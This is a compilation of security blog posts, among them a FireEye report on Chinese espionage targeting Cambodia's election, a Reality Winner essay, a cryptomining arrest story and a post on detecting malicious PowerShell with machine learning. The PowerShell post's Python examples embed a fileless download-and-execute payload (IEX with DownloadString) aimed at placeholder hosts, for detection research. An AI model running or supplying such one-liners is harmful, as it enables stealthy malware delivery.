 | TOP_NEWS_Japan_to_Support_the_Election.js (3c51c89078139337c2c92e084bb0904c) [Figure 4]
 | Philippines-draws-three-hard-new-lines-on-china.js

Table 1: AIRBREAK downloaders

Figure 4: Decoy document associated with AIRBREAK downloader file TOP_NEWS_Japan_to_Support_the_Election.js

SCANBOX Activity Gives Hints to Future Operations

The active SCANBOX server, mlcdailynews[.]com, is hosting articles related to the current Cambodian campaign and broader operations. Articles found on the server indicate targeting of those with interests in U.S.-East Asia geopolitics, Russia and NATO affairs. Victims are likely either brought to the SCANBOX server via strategic website compromise or malicious links in targeted emails with the article presented as decoy material. The articles come from open-source reporting readily available online. Figure 5 is a SCANBOX welcome page and Table 2 is a list of the articles found on the server.

Figure 5: SCANBOX welcome page

Copied Article Topic | Article Source (Not Compromised)
Leaders confident yet nervous | Khmer Times
Mahathir_ 'We want to be friendly with China |
PM urges voters to support CPP for peace |
CPP determined to maintain Kingdom's peace and development |
Bun Chhay's wife dies at 60 |
Crackdown planned on boycott callers |
Further floods coming to Kingdom |
Kem Sokha again denied bail |
PM vows to stay on as premier to quash traitors |
Iran_ Don't trust Trump | Fresh News
Kim-Trump summit_ Singapore's role |
Trump's North Korea summit may bring peace declaration - but at a cost |
U.S. pushes NATO to ready more forces to deter Russian threat |
Interior Minister Sar Kheng warns of dirty tricks | Phnom Penh Post
Another player to enter market for cashless pay |
Donald Trump says he has 'absolute right' to pardon himself but he's done nothing wrong - Donald Trump's America | ABC News
China-funded national road inaugurated in Cambodia | The Cambodia Daily
Kim and Trump in first summit session in Singapore | Asia Times
U.S. to suspend military exercises with South Korea, Trump says | U.S. News
Rainsy defamed the King_ Hun Sen | Associated Press

Table 2: SCANBOX articles copied to server

TEMP.Periscope Malware Suite

Analysis of the malware inventory contained on the three servers found a classic suite of TEMP.Periscope payloads, including the signature AIRBREAK, MURKYTOP, and HOMEFRY. In addition, FireEye’s analysis identified new tools, EVILTECH and DADBOD (Table 3).

EVILTECH

  • EVILTECH is a JavaScript sample that implements a simple RAT with support for uploading, downloading, and running arbitrary JavaScript.
  • During the infection process, EVILTECH is run on the system, which then causes a redirect and possibly the download of additional malware or a connection to another attacker-controlled system.

DADBOD (Credential Theft)

  • DADBOD is a tool used to steal user cookies.
  • Analysis of this malware is still ongoing.

Table 3: New additions to the TEMP.Periscope malware suite

Data from Logs Strengthens Attribution to China

Our analysis of the servers and surrounding data in this latest campaign bolsters our previous assessment that TEMP.Periscope is likely Chinese in origin. Data from a control panel access log indicates that operators are based in China and are operating on computers with Chinese language settings.

A log on the server revealed IP addresses that had been used to log in to the software used to communicate with malware on victim machines. One of the IP addresses is located in Hainan, China. Other addresses belong to virtual private servers, but artifacts indicate that the computers used to log in are, in all cases, configured with Chinese language settings.

Outlook and Implications

The activity uncovered here offers new insight into TEMP.Periscope’s activity. We were previously aware of this actor’s interest in maritime affairs, but this compromise gives additional indications that it will target the political system of strategically important countries. Notably, Cambodia has served as a reliable supporter of China’s South China Sea position in international forums such as ASEAN and is an important partner. While Cambodia is rated as Authoritarian by the Economist’s Democracy Index, the recent surprise upset of the ruling party in Malaysia may motivate China to closely monitor Cambodia’s July 29 elections.

The targeting of the election commission is particularly significant, given the critical role it plays in facilitating voting. There is not yet enough information to determine why the organization was compromised, whether simply to gather intelligence or as part of a more complex operation. Regardless, this incident is the most recent example of aggressive nation-state intelligence collection on election processes worldwide.

We expect TEMP.Periscope to continue targeting a wide range of government and military agencies, international organizations, and private industry. However focused this group may be on maritime issues, several incidents underscore their broad reach, which has included European firms doing business in Southeast Asia and the internal affairs of littoral nations. FireEye expects TEMP.Periscope will remain a virulent threat for those operating in the area for the foreseeable future.

Reality and the Espionage Act


Reality Winner, the first whistleblower prosecuted by the Trump administration for leaking information to the press, will spend five years in prison as punishment for making officials and the public aware of vulnerabilities in election infrastructure. This unusually long sentence breaks with precedent, and is representative of the government’s increasing willingness to use the Espionage Act to punish and imprison whistleblowers and chill journalism.

On June 3, 2017, FBI agents raided Winner's home in Georgia. Federal prosecutors suspected that Winner, an intelligence contractor who worked with the NSA, had shared classified information with journalists, and obtained a warrant to search her house and seize her electronic devices. After the FBI agents finished searching her home, they began chatting with her, casually at first, in what eventually turned into an interrogation that ended with her arrest. Winner later said that the FBI agents never told her that she had the right to remain silent or to speak with an attorney.

Two days later, The Intercept published a partially-redacted version of a classified NSA document, which concluded that hackers they believe were working with Russian military intelligence had tried to penetrate states’ election systems during the 2016 election. On June 8, Winner was formally arraigned on one charge of violating 18 U.S.C. § 793(e), a provision of the Espionage Act.

Passed in 1917, the Espionage Act was originally intended to be used against foreign spies and saboteurs during World War I. But almost immediately after the Espionage Act was enacted, it was used to prosecute anti-war activists, including socialist presidential candidate Eugene Debs. The Supreme Court shamefully upheld the convictions of anti-war protesters in a series of unanimous decisions in 1919.

In 1971, Daniel Ellsberg leaked the Pentagon Papers — a classified history of the Vietnam War, which revealed that the government had repeatedly lied to the American people — to reporters at The New York Times and Washington Post. While the Supreme Court ruled that the government could not stop the papers from publishing articles about the documents, the Nixon administration retaliated against Ellsberg by charging him under the Espionage Act. Ultimately his case was thrown out for government misconduct. He was the first person to be prosecuted under the law for giving information to journalists, but he would not be the last.

During the Obama administration, the Department of Justice prosecuted at least eight people for sharing classified information with journalists. Most of the Espionage Act cases brought by Obama’s Justice Department never made it to trial, and instead, defendants were forced to take a plea deal. That’s partly because it’s next to impossible to mount an effective defense against an Espionage Act charge.

The Espionage Act simply prohibits the unauthorized disclosure of information related to the national defense — a broad category that includes information about controversial government programs, as well as true military secrets like the nuclear codes.

Defendants charged with violating the law cannot present an argument that the leak was justified or in the public interest. To convict a defendant under the Espionage Act, federal prosecutors don't need to prove that the leak actually put anyone in danger. All they need to prove is that the defendant knew the information was "related to national defense" when they gave it to journalists.

The federal government’s classification system is governed through executive orders, which give executive branch agencies the ability to designate certain information as “confidential,” “secret,” and “top-secret” if they determine that the disclosure of the information could potentially harm national security. Since the executive branch is (at least in theory) only allowed to classify information that it believes could harm national security, all classified information is assumed to be potentially dangerous to national security — even though we know this system is regularly and systematically abused to hide controversial, embarrassing, corrupt, or illegal activity.

This circular logic (classified information must be dangerous, because if it weren’t dangerous, it wouldn’t be classified) means that the government can argue that leaking any classified information is functionally equivalent to leaking information that you know can harm the United States.

Winner wanted to challenge this assumption that all classified information is potentially dangerous. Court filings show that her attorneys planned to argue that the NSA report on Russian hacking attempts that Winner allegedly leaked had been over-classified, and the government’s claims that the release of the document would cause “exceptionally grave damage” were without merit.

Her attorneys tried to subpoena a wide array of intelligence agencies, hoping to show that the information Winner allegedly leaked about Russian hacking attempts was less of a state secret and more of an open secret within the government.

They also planned to enlist an expert witness — Bill Leonard, the former head of the Information Security Oversight Office, responsible for overseeing the federal government’s entire classification system — to testify about the government’s over-classification problem.

But Winner’s case once again proved it’s hard, if not impossible, to fight an Espionage Act prosecution. A judge denied all of Winner’s attempts to subpoena government agencies and imposed draconian security precautions on her attorneys, which prohibited them from discussing Winner’s case on unsecured phone lines or conducting Google searches for information about the document Winner allegedly leaked.

Meanwhile, Winner was held in a small county jail without bail for more than a year, after prosecutors convinced a judge that Winner was a flight risk because she had criticized the United States and could speak multiple foreign languages.

Winner’s treatment was harsh even by the standard of other Espionage Act prosecutions. Others charged with leaking classified information —like Jeffrey Sterling, Stephen Kim, and John Kiriakou—were released on bond.

Finally, on June 26, 2018, after over a year of fighting the case, Winner pleaded guilty to one count of violating the Espionage Act. According to the terms of her plea deal, Winner will serve 63 months in prison, followed by three years of supervised release.

“The use of the Espionage charge prevents a person from defending themselves or explaining their actions to a jury, thus making it difficult for them to receive a fair trial and treatment in the court system," Winner’s mother, Billie Winner-Davis, said in a statement. "I do believe that whatever [Reality] did or did not do she acted with good intentions. ... We need to work toward reforming laws so that the Espionage Act is not leveraged against our citizens."

Winner’s sentence is hardly lenient. She was a first-time offender, only accused of leaking one document. She was charged with a single count of violating 18 U.S.C. § 793(e), a section of the Espionage Act that carries a maximum sentence of 10 years. Winner’s sentence is the longest sentence that a leaker has ever received in federal court. (Chelsea Manning, who was originally sentenced to 35 years in prison and later had her sentence commuted by President Obama after 7 years, was convicted at a military court-martial.)

Winner’s only crime, literally, was to share information with journalists and the American people about a foreign government’s attempt to hack U.S. voting systems. State election boards reportedly appreciated Winner’s leak, which gave them the information needed to investigate Russian hacking attempts and better secure their electronic voting infrastructure.

But the federal government treated Winner as though she were a spy. Federal prosecutors charged her with violating an anti-espionage statute that is more than a century old, while arguing that she had to remain detained without bail until trial because she had no loyalty to the United States.

The Department of Justice’s increasing use of the Espionage Act against people who share information with journalists is shameful. A country that claims to value the freedom of the press should not imprison people for speaking to journalists.

Update: On July 13, 2018, the Department of Justice announced the indictment of 12 Russian intelligence officers on charges of hacking. The grand jury indictment, which is unclassified and available to the public, includes information about Russian attempts to hack state election systems — the same information that Winner allegedly leaked to The Intercept.

Blackhat, BSidesLV and DEF CON Parties 2018


For real, we’re back once again for the Blackhat, BSidesLV and DEF CON Parties 2018. Here is the list. Please note that this is a work in progress and I’ll be sure to add more as I become aware of them.

Please note that this sched should work fine in most smart phone browsers.


Be sure to RSVP for parties that request it, as the vast majority will not be allowing folks to register at the door. Please note that events which are not searchable, or have not directly requested I post them, will not be included here.

Got a Party?

Most importantly, if I’m missing a 2018 party here, please let me know through our contact form and I’ll be sure to add it.

Copyright: pressmaster / 123RF Stock Photo

Date | Party Host | Location | Time | Link
August 7, 2018 | Risky Biz Party | Alexxa’s Bar | 7:00 PM – 10:00 PM | RSVP
August 7, 2018 | HackerOne | Eyecandy Sound Lounge | 8:00 PM – 11:00 PM | RSVP
August 7, 2018 | A10 | Libertine Social in Mandalay Bay | 6:00 PM – 8:00 PM | RSVP
August 7, 2018 | Distil Networks | Light Nightclub at the Mandalay Bay | 9:00 PM – 12:00 AM | RSVP
August 7, 2018 | Black Hat Social Hour | Aureole | 5:30 PM – 8:00 PM | RSVP
August 8, 2018 | Duo Security Party | Fleur in Mandalay Bay | 7:00 PM – 9:00 PM | RSVP
August 8, 2018 | Flashpoint Party | Libertine Social in Mandalay Bay | 7:00 PM – 10:00 PM | RSVP
August 8, 2018 | LevelUP | Skyfall Lounge in the Delano | 8:00 PM – 12:00 AM | RSVP
August 8, 2018 | IOActive IOAsis | House of Blues | 10:00 AM – 6:00 PM | RSVP
August 8, 2018 | Cylance Blackhat Party | minus5° Ice Experience | 9:00 PM – 1:00 AM | RSVP
August 8, 2018 | Rapid7 Party | OMNIA Nightclub, Caesars | 10:00 PM – 1:00 AM | RSVP
August 8, 2018 | Cisco Party | Topgolf Las Vegas | 8:00 PM – 11:00 PM | RSVP
August 8, 2018 | Carbon Black | Bordergrill in Mandalay Bay | 7:00 PM – 9:00 PM | RSVP
August 8, 2018 | JASK & Digitalshadows | Eyecandy Sound Lounge | 8:00 PM – 10:00 PM | RSVP
August 8, 2018 | BSidesLV Pool Party | Tuscany Suites Pool | 10:00 PM – 4:00 AM | BSidesLV badge required
August 9, 2018 | Bugcrowd House Party | Rockhouse Bar | 8:00 PM – 12:00 AM | RSVP
August 10, 2018 | IOActive Women, Wisdom, & Wine | Caesars Palace Suites | 3:00 PM – 5:00 PM | RSVP
August 10, 2018 | QueerCon Pool Party | Palm’s Palace Pool | 8:00 PM – 3:00 AM | Open

The post Blackhat, BSidesLV and DEF CON Parties 2018 appeared first on Liquidmatrix Security Digest.

Chinese arrest 20 in major Crypto Currency Mining scam

According to Chinese-language publication Legal Daily, police in two districts of China have arrested 20 people for their roles in a major cryptocurrency mining operation that earned the criminals more than 15 million yuan (currently about $2M USD).

The hackers installed mining software developed by Dalian Yuping Network Technology Company ( 大连昇平网络科技有限 ) that was designed to steal three types of coins: Digibyte (DGB, currently valued at USD$0.03 each), Siacoin (SC, currently valued at $0.01 each), and Decred (DCR, currently valued at $59.59 each).

It is believed that these currencies were chosen for two reasons: they are easier to mine, due to less competition, and they are less likely to be the target of sophisticated blockchain analysis tools.

The Game Cheat Hacker

The investigation began when Tencent detected a hidden Trojan horse with silent mining capabilities built into a cheat for a popular first-person shooter video game. The plug-in provided a variety of cheats for the game, including "automatic aiming", "bullet acceleration", "bullet tracking" and "item display."
Tencent referred the case to the Wei'an Municipal Public Security Bureau, which handled it extremely well. As investigators learned more about the trojans, they first identified the social media groups and forums where the trojan was being spread, then traced the identity of the person uploading the trojaned game cheat: a criminal named Yang Mobao. Mobao was a moderator on a forum called the "Tianxia Internet Bar Forum", and members who received the cheat from him there shared it widely on other forums and social media sites, including many file shares on Baidu.
Mobao popularized the cheat program by encouraging others to suggest new functionality. The users of the tool did not suspect that they were actually mining cryptocurrency while using the cheat. More than 30,000 victims ran his cheat software, secretly mining cryptocurrency for him.
Yang Mobao had a strong relationship with gamers through his business of selling gaming video cards to Internet cafes. He installed at least 5,774 cards in at least 2,465 Internet cafes across the country, preloading the firmware on the cards to perform mining. It turns out that these cards were ALSO trojaned! As a major customer of Dalian Yuping, Mobao was offered a split of the mining proceeds from the cards he installed, earning him more than 268,000 yuan.
Yang is described as a self-taught computer programmer who had previously worked in Internet cafe management. After profiting from the scheme above, he modified the malware embedded in some of the video cards and installed his own miner, mining the HSR coin and transferring the proceeds to a wallet he controlled.

The Video Card Maker

After Yang Mobao confessed to his crimes, the cybercrime task force sent 50 agents to Dalian, in Liaoning Province. The task force learned that Dalian Yuping Network Technology had been approached by advertisers, who paid them to embed advertising software on their video cards; those cards were then installed in 3.89 million computers, mostly high-end gaming systems in Internet cafes. The company's owner, He Mou, and its financial controller, his wife Chen Mou, had instructed the company's head of R&D, Zhang Ning, to investigate mining software and to experiment with various mining trojans. In addition to the illegal advertising software embedded in those 3.89 million video cards, their cryptocurrency mining software was embedded into 1 million additional video cards, which were sold and deployed in Internet cafes across the country.
Each time one of those machines successfully mined a coin, the coin was transferred to a wallet owned by He Mou.  Chen Mou could then cash them out at any time in the future.
Sixteen suspects at the company were interrogated, and 12 were criminally detained for the crime of illegally controlling computer information systems. Zhao was sentenced to four years himself.
(I learned of this story from CoinDesk's Wolfie Zhao, and followed up on it via the Legal Daily story he links to, as well as a report in Xinhuanet by reporter Xu Peng and correspondents Liu Guizeng and Wang Yan.) (记者 徐鹏 通讯员 刘贵增 王艳)

Malicious PowerShell Detection via Machine Learning


Cyber security vendors and researchers have reported for years how PowerShell is being used by cyber threat actors to install backdoors, execute malicious code, and otherwise achieve their objectives within enterprises. Security is a cat-and-mouse game between adversaries, researchers, and blue teams. The flexibility and capability of PowerShell has made conventional detection both challenging and critical. This blog post will illustrate how FireEye is leveraging artificial intelligence and machine learning to raise the bar for adversaries that use PowerShell.

In this post you will learn:

  • Why malicious PowerShell can be challenging to detect with a traditional “signature-based” or “rule-based” detection engine.
  • How Natural Language Processing (NLP) can be applied to tackle this challenge.
  • How our NLP model detects malicious PowerShell commands, even if obfuscated.
  • The economics of increasing the cost for the adversaries to bypass security solutions, while potentially reducing the release time of security content for detection engines.


PowerShell is one of the most popular tools used to carry out attacks. Data gathered from FireEye Dynamic Threat Intelligence (DTI) Cloud shows malicious PowerShell attacks rising throughout 2017 (Figure 1).

Figure 1: PowerShell attack statistics observed by FireEye DTI Cloud in 2017 – blue bars for the number of attacks detected, with the red curve for exponentially smoothed time series

FireEye has been tracking the malicious use of PowerShell for years. In 2014, Mandiant incident response investigators published a Black Hat paper that covers the tactics, techniques and procedures (TTPs) used in PowerShell attacks, as well as forensic artifacts on disk, in logs, and in memory produced from malicious use of PowerShell. In 2016, we published a blog post on how to improve PowerShell logging, which gives greater visibility into potential attacker activity. More recently, our in-depth report on APT32 highlighted this threat actor's use of PowerShell for reconnaissance and lateral movement procedures, as illustrated in Figure 2.

Figure 2: APT32 attack lifecycle, showing PowerShell attacks found in the kill chain

Let’s take a deep dive into an example of a malicious PowerShell command (Figure 3).

Figure 3: Example of a malicious PowerShell command

The following is a quick explanation of the arguments:

  • -NoProfile – indicates that the current user’s profile setup script should not be executed when the PowerShell engine starts.
  • -NonI – shorthand for -NonInteractive, meaning an interactive prompt to the user will not be presented.
  • -W Hidden – shorthand for “-WindowStyle Hidden”, which indicates that the PowerShell session window should be started in a hidden manner.
  • -Exec Bypass – shorthand for “-ExecutionPolicy Bypass”, which disables the execution policy for the current PowerShell session (default disallows execution). It should be noted that the Execution Policy isn’t meant to be a security boundary.
  • -encodedcommand – indicates the following chunk of text is a base64 encoded command.

What is hidden inside the Base64 decoded portion? Figure 4 shows the decoded command.

Figure 4: The decoded command for the aforementioned example

Interestingly, the decoded command unveils stealthy fileless network access and remote content execution!

  • IEX is an alias for the Invoke-Expression cmdlet that will execute the command provided on the local machine.
  • The new-object cmdlet creates an instance of a .NET Framework or COM object, here a net.webclient object.
  • The downloadstring method will download the contents from <url> into a memory buffer (which in turn IEX will execute).
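For readers who want to reproduce the decoding step themselves: -encodedcommand payloads are Base64 over UTF-16LE text, so a couple of lines of Python can round-trip them. The payload string below is purely illustrative, not the command from the figures.

```python
import base64

def decode_powershell_command(b64: str) -> str:
    # PowerShell's -EncodedCommand expects Base64 over UTF-16LE text
    return base64.b64decode(b64).decode("utf-16-le")

# Illustrative payload only; a real sample would come from logs or a sandbox
payload = "IEX (New-Object Net.WebClient).DownloadString('http://example.test/a')"
encoded = base64.b64encode(payload.encode("utf-16-le")).decode("ascii")

print(decode_powershell_command(encoded))  # prints the original payload
```

The same two calls in reverse are how an attacker produces the encoded command in the first place, which is why the decoding step sits at the very front of any analysis pipeline.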

It’s worth mentioning that a similar malicious PowerShell tactic was used in a recent cryptojacking attack exploiting CVE-2017-10271 to deliver a cryptocurrency miner. This attack involved the exploit being leveraged to deliver a PowerShell script, instead of downloading the executable directly. This PowerShell command is particularly stealthy because it leaves practically zero file artifacts on the host, making it hard for traditional antivirus to detect.

There are several reasons why adversaries prefer PowerShell:

  1. PowerShell has been widely adopted in Microsoft Windows as a powerful system administration scripting tool.
  2. Most attacker logic can be written in PowerShell without the need to install malicious binaries. This enables a minimal footprint on the endpoint.
  3. The flexible PowerShell syntax imposes combinatorial complexity challenges to signature-based detection rules.

Additionally, from an economics perspective:

  • Offensively, the cost for adversaries to modify PowerShell to bypass a signature-based rule is quite low, especially with open source obfuscation tools.
  • Defensively, updating handcrafted signature-based rules for new threats is time-consuming and limited to experts.

Next, we would like to share how we at FireEye are combining our PowerShell threat research with data science to combat this threat, thus raising the bar for adversaries.

Natural Language Processing for Detecting Malicious PowerShell

Can we use machine learning to predict if a PowerShell command is malicious?

One advantage FireEye has is our repository of high quality PowerShell examples that we harvest from our global deployments of FireEye solutions and services. Working closely with our in-house PowerShell experts, we curated a large training set composed of malicious commands, as well as benign commands found in enterprise networks.

After we reviewed the PowerShell corpus, we quickly realized this fit nicely into the NLP problem space. We have built an NLP model that interprets PowerShell command text, similar to how Amazon Alexa interprets your voice commands.

One of the technical challenges we tackled was synonyms, a problem studied in linguistics. For instance, “NOL”, “NOLO”, and “NOLOGO” have identical semantics in PowerShell syntax. In NLP, a stemming algorithm reduces a word to its original form, such as “Innovating” being stemmed to “Innovate”.

We created a prefix-tree based stemmer for the PowerShell command syntax using an efficient data structure known as a trie, as shown in Figure 5. Even in a complex scripting language such as PowerShell, a trie can stem command tokens in nanoseconds.

Figure 5: Synonyms in the PowerShell syntax (left) and the trie stemmer capturing these equivalences (right)
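A toy version of such a trie stemmer is easy to sketch in Python. The synonym sets below are the ones discussed above; the class itself is our own illustrative implementation, not FireEye's:

```python
class TrieStemmer:
    """Toy prefix-tree stemmer mapping known flag synonyms to one canonical token."""

    def __init__(self):
        self.root = {}

    def add(self, synonyms, canonical):
        # Insert each synonym; a "$" key marks a terminal node with its canonical form
        for word in synonyms:
            node = self.root
            for ch in word.lower():
                node = node.setdefault(ch, {})
            node["$"] = canonical

    def stem(self, token):
        # Walk the trie one character at a time; unknown tokens come back unchanged
        node, lowered = self.root, token.lower()
        for ch in lowered:
            if ch not in node:
                return lowered
            node = node[ch]
        return node.get("$", lowered)

stemmer = TrieStemmer()
stemmer.add(["nol", "nolo", "nologo"], "nologo")
stemmer.add(["noni", "noninteractive"], "noninteractive")

print(stemmer.stem("NOLO"))  # prints: nologo
```

A production stemmer would also need to handle ambiguous prefixes and parameter arguments, but the lookup cost stays the same: one trie walk per token.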

The overall NLP pipeline we developed is captured in the following table:

NLP Key Modules

  • Decoder – detect and decode any encoded text.
  • Named Entity Recognition (NER) – detect and recognize any entities such as IPs, URLs, email addresses, Registry keys, etc.
  • Tokenizer – tokenize the PowerShell command into a list of tokens.
  • Stemmer – stem tokens into semantically identical tokens, using the trie.
  • Vocabulary Vectorizer – vectorize the list of tokens into a machine learning friendly format.
  • Supervised classifier – binary classification algorithms: Kernel Support Vector Machine, Gradient Boosted Trees, and Deep Neural Networks.
  • The explanation of why the prediction was made, enabling analysts to validate predictions.

The following are the key steps when streaming the aforementioned example through the NLP pipeline:

  • Detect and decode the Base64 commands, if any
  • Recognize entities using Named Entity Recognition (NER), such as the <URL>
  • Tokenize the entire text, including both clear text and obfuscated commands
  • Stem each token, and vectorize them based on the vocabulary
  • Predict the malicious probability using the supervised learning model

Figure 6: NLP pipeline that predicts the malicious probability of a PowerShell command
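To make those steps concrete, here is a deliberately tiny end-to-end stand-in for the pipeline. Everything in it (the vocabulary, the hand-set weights, and the regex-based entity recognition) is invented for illustration and bears no relation to FireEye's trained model:

```python
import base64
import re

VOCAB   = ["iex", "new-object", "net.webclient", "downloadstring", "<url>", "get-childitem"]
WEIGHTS = [2.0, 1.0, 1.5, 2.0, 1.0, -1.0]  # hand-set stand-in for a trained classifier

def normalize(cmd: str) -> list:
    # Step 1: detect and decode any -EncodedCommand payload (Base64 over UTF-16LE)
    m = re.search(r"-enc\w*\s+([A-Za-z0-9+/=]+)", cmd, re.I)
    if m:
        cmd = base64.b64decode(m.group(1)).decode("utf-16-le")
    # Step 2: entity-recognition stand-in; collapse every URL to a single token
    cmd = re.sub(r"https?://\S+", "<url>", cmd.lower())
    # Step 3: tokenize
    return re.findall(r"<url>|[a-z0-9][\w\-\.]*", cmd)

def malicious_score(cmd: str) -> float:
    # Steps 4-5: bag-of-words vectorization, then a toy linear score
    tokens = normalize(cmd)
    vector = [tokens.count(word) for word in VOCAB]
    return sum(w * x for w, x in zip(WEIGHTS, vector))

print(malicious_score("IEX (New-Object Net.WebClient).DownloadString('http://evil.test/x')"))
```

Even this toy version shows the economics at work: an attacker who re-encodes or re-cases the command changes nothing, because decoding, lowercasing, and stemming happen before the classifier ever sees the tokens.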

More importantly, we established a production end-to-end machine learning pipeline (Figure 7) so that we can constantly evolve with adversaries through re-labeling and re-training, and the release of the machine learning model into our products.

Figure 7: End-to-end machine learning production pipeline for PowerShell machine learning

Value Validated in the Field

We successfully implemented and optimized this machine learning model to a minimal footprint that fits into our research endpoint agent, which is able to make predictions in milliseconds on the host. Throughout 2018, we have deployed this PowerShell machine learning detection engine on incident response engagements. Early field validation has confirmed detections of malicious PowerShell attacks, including:

  • Commodity malware such as Kovter.
  • Red team penetration test activities.
  • New variants that bypassed legacy signatures but were detected by our machine learning model with high probabilistic confidence.

The unique values brought by the PowerShell machine learning detection engine include:  

  • The machine learning model automatically learns the malicious patterns from the curated corpus. In contrast to traditional detection signature rule engines, which are Boolean expression and regex based, the NLP model has lower operation cost and significantly cuts down the release time of security content.
  • The model performs probabilistic inference on unknown PowerShell commands by the implicitly learned non-linear combinations of certain patterns, which increases the cost for the adversaries to bypass.

The ultimate value of this innovation is to evolve with the broader threat landscape, and to create a competitive edge over adversaries.


We would like to acknowledge:

  • Daniel Bohannon, Christopher Glyer and Nick Carr for the support on threat research.
  • Alex Rivlin, HeeJong Lee, and Benjamin Chang from FireEye Labs for providing the DTI statistics.
  • Research endpoint support from Caleb Madrigal.
  • The FireEye ICE-DS Team.

If An Infosec Policy Falls In The Forest

When you are building an Information Security practice you need a solid governance structure in place. For those of you who might not be familiar, we can look at it in a more accessible way: if you are building a house, you need a solid foundation, otherwise the thing will collapse.
Much in the same vein, if you do not have a solid set of policies, you are destined to fail.

All is not lost, as there are all sorts of resources available to help you online. The key point to remember is that anything you find should never be used verbatim. If you cut and paste a policy you find online and swap the letterhead, you should just hang up your tin star now. Do not pass go. Do not collect $200.

Why? Well, let’s cut to the chase. No company is the same as the next, and you would be doing yourself and your organization a disservice by pretending otherwise. Just because you work at Bank A and Bob has a job in governance at Bank B does not mean you can take his policy and simply use it as your own. Realistically, you will need to tailor any policy to your own environment.

If you don’t have a proper governance structure in place it can cause you some angst. As an example, how can you remove an employee who is surfing porn on the Internet if you have no framework in place to deal with such an action? That is the simplest example that comes to mind.

To spin it differently, there was a shop I worked for where I was told that I could not use a certain piece of software. It was a fairly benign application, so I couldn’t help but ask why. Bear in mind, I had no argument with being told no; I was just interested in the rationale for that decision. The answer I received was, “because $group said no.”


I asked the unforgivable question. I said, “OK, can I see the documentation regarding that decision? I just want to better understand why.” I was greeted with a Jedi hand wave. This isn’t OK. If you don’t have things documented, then they do not exist. Pure and simple.
So, when you are tackling the policies for your organization, be sure to go beyond the flaming-sword-of-justice approach to governance. It is simply a dead method for building the foundation of your security program. You want to facilitate the business in a safe and secure way, ensuring that security is not the “road block” of old while saving the organization from itself.

When you create your policy documents, make sure that they are reviewed by senior leadership, legal, and human resources. Failing to do so will limit the credibility and adoption of a policy.

If you do not communicate your policies within your organization, how can you expect people to abide by them? Communication is a mainstay of any governance program. Go forth and bring the positive word of security to the masses.

If an information security policy falls in the corporate forest…does anyone read it?

Originally posted on CSO Online by me.

The post If An Infosec Policy Falls In The Forest appeared first on Liquidmatrix Security Digest.

Threat Model Thursdays: Crispin Cowan

Over at the Leviathan blog, Crispin Cowan writes about “The Calculus Of Threat Modeling.” Crispin and I have collaborated and worked together over the years, and our approaches are explicitly aligned around the four question frame.

What are we working on?

One of the places where Crispin goes deeper is definitional. He’s very precise about what a security principal is:

A principal is any active entity in a system with access privileges that are in any way distinct from some other component it talks to. Corollary: a principal is defined by its domain of access (the set of things it has access to). Domains of access can, and often do, overlap, but that they are different is what makes a security principal distinct.

This also leads to the definition of attack surface (where principals interact), trust boundaries (the sum of the attack surfaces) and security boundaries (trust boundaries for which the engineers will fight). These are more well-defined than I tend to have, and I think it’s a good set of definitions, or perhaps a good step forward in the discussion if you disagree.
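These definitions are crisp enough to express in code. Here is a minimal sketch; the component names and domains are hypothetical, purely to illustrate the definitions:

```python
# A principal is defined by its domain of access: the set of things it can touch.
domains = {
    "web_frontend": frozenset({"session_store", "public_api"}),
    "api_server":   frozenset({"public_api", "database"}),
}

def is_distinct_principal(a: str, b: str) -> bool:
    # Corollary from the post: two components are distinct principals
    # iff their domains of access differ in any way
    return domains[a] != domains[b]

def attack_surface(a: str, b: str) -> frozenset:
    # Attack surfaces arise where distinct principals interact,
    # i.e. where their (possibly overlapping) domains of access meet
    if not is_distinct_principal(a, b):
        return frozenset()
    return domains[a] & domains[b]

print(attack_surface("web_frontend", "api_server"))  # frozenset({'public_api'})
```

Summing such surfaces over all pairs of principals gives the trust boundaries; the subset the engineers will actually fight for are the security boundaries.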

What can go wrong?

His approach adds a much more explicit description of the principals who own elements of the diagram, and several self-check steps (“Ask again if we have all the connections…”). I think of these as part of “did we do a good job?”, and it’s great to integrate such checks on an ongoing basis, rather than treating them as a step at the end.

What are we going to do about it?

Here Crispin covers assessing complexity and mitigations. Assessing complexity is an interesting approach — a great many vulnerabilities appear on the most complex interfaces, and I think it’s a useful strategy, similar to ‘easy fixes first’ as a prioritization approach.

He also has “c. Be sure to take a picture of the white board after the team is done describing the system.” “d. Go home and create a threat model diagram.” These are interesting steps, and I think deserve some discussion as to form (I think this is part of ‘what are we working on?’) and function. To function, we already have “a threat model diagram,” and a record of it, in the picture of the whiteboard. I’m nitpicking here for two very specific reasons. First, the implication that what was done isn’t a threat model diagram isn’t accurate, and second, as the agile world likes to ask “why are you doing this work?”

I also want to ask: is there a reason to go from whiteboard to Visio? Also, as Crispin says, he’s not simply transcribing; he’s doing some fairly nuanced technical editing, e.g., “Collapse together any nodes that are actually executing as the same security principal.” That means you can’t hand off the work to a graphic designer; you need an expensive security person to re-consider the whiteboard diagram. There are times that’s important: if the diagram will be shown widely across many meetings, if the diagram will go outside the organization (say, to regulators), or if the engineering process is waterfall-like.

Come together

Crispin says that tools are substitutes for expertise, and that (a? the?) best practice is for a security expert and the engineers to talk. I agree, this is a good way to do it — I also like to train the engineers to do this without security experts each time.

And that brings me to the we/you distinction. Crispin conveys the four question frame in the second person (What are you doing, what did you do about it), and I try to use the first person plural (we; what are we doing). Saying ‘we’ focuses on collaboration, on dialogue, on exploration. Saying ‘you’ frames this as a review, a discussion, and who knows, possibly a fight. Both of us used that frame at a prior employer, and today when I consult, I use it because I’m really not part of the doing team.

That said, I think this was a super-interesting post for the definitions, and for showing the diagram evolution and the steps taken from a whiteboard to a completed, colored diagram.

The image is the frontispiece of Leviathan by Thomas Hobbes, with its famous model of the state, made up of the people.

Cyber Security Roundup for June 2018

Dixons Carphone said hackers attempted to compromise 5.9 million payment cards and accessed 1.2 million personal data records. The company, which was heavily criticised for poor security and fined £400,000 by the ICO in January after being hacked in 2015, said in a statement that the hackers had attempted to gain access to one of the processing systems of Currys PC World and Dixons Travel stores. The statement confirmed 1.2 million personal records had been accessed by the attackers. No details were disclosed explaining how hackers were able to access such large quantities of personal data, just a typical cover statement that "the investigation is still ongoing". It is likely this incident occurred before the GDPR law kicked in at the end of May, so the company could be spared the new, more significant financial penalties and sanctions the GDPR gives the ICO, but it is certainly worth watching the ICO's response to a repeat offender which had already received a record ICO fine this year. The ICO (statement) and the NCSC (statement) have both released statements about this breach.

